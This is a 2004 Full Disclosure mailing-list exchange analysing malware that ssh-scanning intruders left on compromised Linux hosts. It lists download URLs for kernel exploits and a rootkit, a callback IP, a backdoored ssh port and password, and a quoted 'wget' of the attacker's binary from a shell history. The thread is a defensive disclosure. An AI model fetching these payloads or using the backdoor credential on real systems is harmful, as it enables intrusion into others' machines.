Full Disclosure mailing list archives
Re: Automated ssh scanning
From: "VeNoMouS" <venom () gen-x co nz>
Date: Fri, 27 Aug 2004 13:40:01 +1200
lol the amount of people still trying to work out what these binarys are is amusing, i already broke down what each package was and mailed it to full disclosure over 24hrs ago, dont you people read threads?
I'll post it again..... www.bo2k-rulez.net/akernel do_brk exploit by isec - http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php, infected with rst.b , which when run tries to connect to 207.66.155.21 on port 80
requesting /~telecom69/gov.php which is offline. www.corbeanu.as.ro/t.gzPtrace/kmod kernel exploit by isec - http://www.k-otik.com/exploits/03.30.kernel.c.php
http://roarmy.com/god.tgz root kit with backdoor'd ssh listens on port 26000 which replaces smbd binary, loggin of the ssh connections goes to /usr/include/iceconf.h , also has a crappy tcp sniffer which logs to /usr/lib/libice.log,and a syn flooder ***** backdoor password for this ssh door is ice4budu www.generatiapro.go.ro/fast.tgz emech setup for undernet to join #tty.----- Original Message ----- From: "Ron DuFresne" <dufresne () winternet com>
To: "Gary E. Miller" <gem () rellim com> Cc: "Deigo Dude" <deigodude () aol com>; <full-disclosure () lists netsys com> Sent: Friday, August 27, 2004 11:59 AM Subject: Re: [Full-disclosure] Automated ssh scanning
Howdy Gary,-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Yo All! On Thu, 26 Aug 2004, Deigo Dude wrote: > Maybe running this test again, and this time ... No need to run the test again. - From the .history I duplicated this: wget www.bo2k-rulez.net/a Then did this to see the strings in the binary: strings a | less This string looked ineresting: Kernel seems not to be vulnerable A google on that string yields the exloit: http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php A simple exploit for the well known do_brk bug in the Linux kernel...Cool, I was incrrect in assuning this was a fully patched system and the compromise likely being an application sploit it appears. Thanks, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: Automated ssh scanning, (continued)
- Re: Automated ssh scanning KF_lists (Aug 26)
- Re: Automated ssh scanning Richard Verwayen (Aug 26)
- Re: Automated ssh scanning Valdis . Kletnieks (Aug 26)
- RE: Automated ssh scanning Ron DuFresne (Aug 26)
- Re: Automated ssh scanning Deigo Dude (Aug 26)
- Re: Automated ssh scanning KF_lists (Aug 26)
- RE: Automated ssh scanning Todd Towles (Aug 26)
- Re: Automated ssh scanning Tremaine (Aug 26)
- Re: Automated ssh scanning Deigo Dude (Aug 26)
- Re: Automated ssh scanning Gary E. Miller (Aug 26)
- Re: Automated ssh scanning Ron DuFresne (Aug 26)
- Re: Automated ssh scanning VeNoMouS (Aug 26)
- Re: Automated ssh scanning Tremaine (Aug 27)
- Re: Automated ssh scanning Tremaine (Aug 26)
- Re: Automated ssh scanning Ng Pheng Siong (Aug 26)
- Malware can silently open holes in SP2 Firewall jklemenc (Aug 26)